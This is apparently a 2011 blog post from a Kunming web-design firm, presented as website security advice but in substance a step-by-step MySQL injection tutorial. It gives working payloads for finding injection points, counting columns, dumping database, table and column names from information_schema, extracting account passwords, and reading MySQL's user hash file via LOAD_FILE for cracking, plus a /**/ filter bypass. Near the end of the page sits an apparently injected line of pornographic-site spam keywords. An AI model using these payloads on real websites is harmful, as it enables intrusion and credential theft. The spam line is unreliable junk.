<code id="pndtx"></code>
<acronym id="pndtx"></acronym>
  • <td id="pndtx"><ruby id="pndtx"></ruby></td>

    <output id="pndtx"></output>

    云南網站建設創新企業 昆明多彩網絡公司

    在線qq:540105663

    網站制作安全之mysql注入技巧

    來源:昆明多彩網絡公司 日期:2011-09-19 閱讀: 發表評論

    mysql注入指得是通過程序的漏洞(比如沒有過濾),通過執行sql語句進行入侵網站并最終得到服務器權限的行為

     mysql注入大致流程:

    1、得到注入點,在頁面參數后面加'或者and 1=1和and 1=2測試,如果程序報錯或者有一些異常情況(比如執行結果不同)發生則表明該頁面有漏洞存在。

    2、在參數后面加入 order by 10,10,如果沒有什么反應則將后面的10繼續增加,如果報錯就說明字段數少于該數。

    3、暴數據庫名,假設當前被注入表的字段數有3個,通過下面兩種方式得到

       3.1 union select database(),user(),version()

      3.1 在后面加入 union select 1,SCHEMA_NAME,3 from information_schema.SCHEMATA limit 2,1,將得到數據庫名稱,第一個數據庫為information_schema

    4、暴表名,and 1=2 union select 1,table_name,3 from (select * from information_schema.tables where table_schema=0x6861636B)t limit 0,1    0x6861636B為數據庫名稱轉成了16進制,用小葵花工具轉換得到,通過上一步可以得到,注意limit前面的t不能省略。

    5、暴字段名 and 1=2 union select 1,2,column_name from (select * from information_schema.columns where table_name=0x61646D696E and table_schema=0x6861636B)t limit 0,1;0x61646D696E為表名,table_schema為字段名。

    6、union select 1,"字段1","字段2" from "表名" limit 0,1,就可以得到帳戶和密碼了。

    7、其他:得到root的密碼通過LOAD_FILE(’C:\..\MYSQL\DATA\MYSQL\USER.MYD’)得到用戶的HASH散列,之后用CAIN爆破…如果程序過濾了空格,可以使用/**/相當于空格作用

    發表評論評論列表(有 條評論)

    69xx无码在线观看,中文字幕在线高清男人的天堂,国产最新进精品视频,人成视频永久免费播放
    <code id="pndtx"></code>
    <acronym id="pndtx"></acronym>
  • <td id="pndtx"><ruby id="pndtx"></ruby></td>

    <output id="pndtx"></output>